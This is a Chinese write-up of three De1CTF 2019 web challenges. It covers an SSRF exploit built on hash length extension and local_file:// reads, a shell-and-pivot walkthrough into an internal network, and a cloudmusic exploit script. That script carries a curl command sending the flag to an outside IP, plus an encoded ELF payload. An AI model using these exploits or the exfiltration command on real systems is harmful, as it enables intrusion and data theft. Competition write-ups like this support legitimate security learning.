De1CTF 2019 WEB WP

0x00 前言

在家宅着不想写wp，来学第一天补上

0x01 SSRF Me

题目描述

SSRF ME TO GET FLAG.

http://139.180.128.86/

题目解答

#! /usr/bin/env python
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')

app = Flask(__name__)

secert_key = os.urandom(16)


class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):          #SandBox For Remote_Addr
            os.mkdir(self.sandbox)

    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False


#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)


@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
@app.route('/')
def index():
    return open("code.txt","r").read()


def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"



def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()


def md5(content):
    return hashlib.md5(content).hexdigest()


def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False


if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=80)

1. 默认sign的时候试讲action设置为scan来讲文件读进result.txt文件
2. 需要设置sign中的action为read（hash扩展攻击）
3. 利用https://bugs.python.org/issue35907来进行ssrf读文件

EXP:

# -*- coding: utf-8 -*-
import requests
import hashpumpy
import urllib.parse as up

readfile = 'local_file:///proc/self/cwd/flag.txt'
url1 =  'http://139.180.128.86/geneSign?param=' + readfile
req = requests.get(url = url1)
sign = req.content
hash_sign = hashpumpy.hashpump(sign, readfile + 'scan', 'read', 16)
sign_next = hash_sign[0]
action_next = up.quote(hash_sign[1][len(readfile):])
url2 = 'http://139.180.128.86/De1ta?param='+readfile
result = requests.get(url = url2, cookies={'sign': sign_next, 'action': action_next})
print(result.content)

官方解法：
https://github.com/De1ta-team/De1CTF2019/blob/8f981109d95af76456d1e59deab058f8a7bba3b0/writeup/web/SSRF%20Me/README_zh.md

0x02 ShellShellShell

题目描述

hint : The flag file ,with “flag” keyword ,is in the inside computer.(flag文件在内网的机子上，并且flag文件的文件名带有flag关键字)

shell me plz

题目解答

因为对easy-php这题印象深刻，所以看到题目之后立马就联想到了，所以老套路走一波。参考下面这个wp很容易就能getshell

https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540

进到内网之后先查看/etc/hosts文件

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.0.3	df459fa2cbad

发现对应的内网地址，之后使用fcn代理出来，在172.18.0.2上的80端口发现一个代码审计题，题目出自pwnhub，所以参考wp直接传webshell之后包含getshell

https://cloud.tencent.com/developer/article/1360551

之后

find / -name "*flag*"

即可得到flag

PS: 我觉得这题的dockerfile值得一看

0x03 cloudmusic_rev

题目描述

滑稽云音乐平台 2.0 上线了。

Comical CloudMusis 2.0 is online.

题目解答

首先想到国赛决赛中出现的1.0版本
https://github.com/impakho/ciscn2019_final_web1

然后按照这个套路做题：

1. 首先是注册账号处理验证码，这里要求验证码是6位，所以成功注册一个账号adfasd1/123456aaaa

2. 右键查看源代码发现任意文件下载

   

3. 但是不能直接下载php后缀的文件需要bypass

bypass:
(1) 将php://filter/read=convert.base64-encode/resource=../include/firmware.php urlencode最好用bp来完全编码
(2) base64下载源码

4. 因为代码里面此处的不同
   $firmware_filename=md5(mt_rand().$_SERVER['REMOTE_ADDR']);
   所以exp里面要改成IP

5. 上传溢出admin密码的长度变了，之前是0x300，现在是0x70

6. 修改之前的exp后盲打得到flag

{‘username’: ‘admin’, ‘password’: ‘Mike84eiNxHcMVCz’}

#!/usr/bin/python2
#coding:utf-8

from sys import *
from base64 import *
from Crypto.PublicKey import RSA
import requests
import string
import time
import hashlib
import random
import json
from datetime import datetime

timeout = 1.0
retry_count = 5
logging = 1

site_url = ''
s = requests.session()
time_zone_offset = 60 * 60 * 8
# command = "/usr/bin/tac /fl*g*"
command = "curl http://47.90.204.28/`/usr/bin/tac /fl*g*`"
# command = "ls"

preset_key = b64decode('LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUNkd0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQW1Fd2dnSmRBZ0VBQW9HQkFPTWp4eXVIcWRuSmFyUDAKSHl1eFVVRHkvY1BGaWMzYjM5WUQrVzY5R2VSRkpMRDUraFhaM3lYMTFBQ2pMSHpESFpIbGgrajRQZncxdEhMMApwY3FPZmJ0TTF4am5sV2FKd3lZQzRpWlBSRXJUTGNVd282UmhKS2diUkxHQVpLUmxmWFFMbVRwbGd0ZnJoUGhJCng0ZzM2ZEtLTVVlYjZnOHJ3blVrUnVYSVlhd2hBZ01CQUFFQ2dZRUEwUWZrQzFOV0pHOFFHM3ZXRThlakZ6cUgKL3RxVDd6Y2h6enJwR2RnOU02M09EbkIramcxckp1d01wbW1FVDJ6Z2tadkNiOHZFZjQ2TStoM2JWWVc4Zmg1Zwp4dTlXdmJFb0orUGZtV2R6SmowUlRYT05vZXVzRUgwODI3eGl6UXlIc21RbkNBQzkyUS9IQlg4WVl0eDgxN0pOCnNIUmNFMHdacVFmL0dkU0VnK0VDUVFEMGVjUlJYN3BsT0hTOHNjTjFqT3FOMEl5S2pvamljWWNQL2h3ckU2ZjIKZGR3dEpnNlJBb3E3SHlRdUFjYmZCazJwdS9UeDRsSHRycm9qRXlxQTRLdjdBa0VBN2RqUEFCakEvaHlpV1oxTQpDUm5DTTRudWdDUEE1SXRxZktzb3UvbE51cUdYZXFVYW5XNjBTcmJDVWJrM2g2NnkwdXV2T0xzendEWllONnNNClFEWFJrd0pBUlB3N1BtOFJ6TkF5ZUxCOHBDWUFaY1lNY21pb0RhWFZZOWpqbi9BcS9Ddmoxa1dmNUtGZi9rOWEKU1RVdEplL0VhSG5tTTM4V2VVaE5zK29MbTFSS2t3SkFNcCtyNTJ4ZFgzaSt3VzR1YWQxMnJUdVZiT2F2UHJYQgowNGttb1dPOXZKUjZSbHR2MzhSWlVYRzJ5R2d3dm90YmVuTTVsMHlaQmpkSzdZWlZsREVnU3dKQkFMb29yYmZnCkJzMW5BbGU3WnhXK0JkRXlLVG9ZUWdWVU1MRytWeDFITW9rU0dZNlh6blNFYzdpK25weFBoeGd6Q1VWdHpxNU4KR3E4Q3ppN2FJUFVuY0lnPQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==')
preset_music = b64decode('SUQzBAAAAAABBFRSQ0sAAAADAAADMQBUSVQyAAAAEgAAA2JiYmJiYmJiYmJiYmJiYmIAVEFMQgAAABIAAANjY2NjY2NjY2NjY2NjY2NjAFRQRTEAAAASAAADYWFhYWFhYWFhYWFhYWFhYQA=')
preset_firmare = b64decode('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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXVLwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXiLwAA/yXkLwAADx9AAP8l4i8AAGgAAAAA6eD/////JdovAABoAQAAAOnQ/////yXSLwAAaAIAAADpwP////8lyi8AAGgDAAAA6bD/////JYIvAABmkAAAAAAAAAAASI09wS8AAEiNBbovAABIOfh0FUiLBT4vAABIhcB0Cf/gDx+AAAAAAMMPH4AAAAAASI09kS8AAEiNNYovAABIKf5Iwf4DSInwSMHoP0gBxkjR/nQUSIsFFS8AAEiFwHQI/+BmDx9EAADDDx+AAAAAAIA9aS8AAAB1L1VIgz32LgAAAEiJ5XQMSIs9Ki8AAOhd////6Gj////GBUEvAAABXcMPH4AAAAAAww8fgAAAAADpe////1VIieVIg+wQSIsFpC4AAEiLALowAQAAvgAAAABIicfo9/7//0iNNaAOAABIjT2hDgAA6PT+//9IiUX4SIN9+AB0MUiLBWouAABIiwBIi1X4SInRugABAAC+AQAAAEiJx+iW/v//SItF+EiJx+ia/v//6wGQycMASIPsCEiDxAjDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByAAAAAAAAAGFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY